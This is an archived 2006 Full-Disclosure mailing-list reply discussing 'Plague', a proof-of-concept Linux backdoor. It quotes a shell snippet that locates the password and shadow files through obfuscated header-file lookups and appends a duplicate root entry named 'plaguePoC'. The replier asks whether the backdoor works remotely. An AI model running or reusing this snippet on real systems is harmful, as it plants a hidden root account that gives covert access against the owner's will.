| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <e024ccca0610220008u610e8720q67e414e1e06c2434@mail.gmail.com>
Date: Sun, 22 Oct 2006 03:08:44 -0400
From: "Dude VanWinkle" <dudevanwinkle@...il.com>
To: "J. Oquendo" <sil@...iltrated.net>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Plague Proof of Concept Linux backdoor
On 10/22/06, J. Oquendo <sil@...iltrated.net> wrote:
>
> Plague is an odd proof of concept backdoor keeping
> tool based on the premise of using existing system
> files and commands to keep and maintain a backdoor
> on Linux systems. I could have modified this for
> BSD, Solaris, etc., but I didn't feel like doing
> the work...
>
> http://www.infiltrated.net/plague
>
(from the link)
if [ -e /usr/include/paths.h ]
then
file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
sed -n '1p' $file|sed 's/root/plaguePoC/g' >> $file
file2=`awk 'NR==74 {print $8}' /usr/include/sysexits.h`
sed -n '1p' $file2|sed 's/root/plaguePoC/g' >> $file2
fi
--------------------------------
So this backdoor wouldnt work remotely, correct? You would need to add
the user to the people allowed to ssh in, and poke a hole for ssh in
the firewall./?
-JP
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists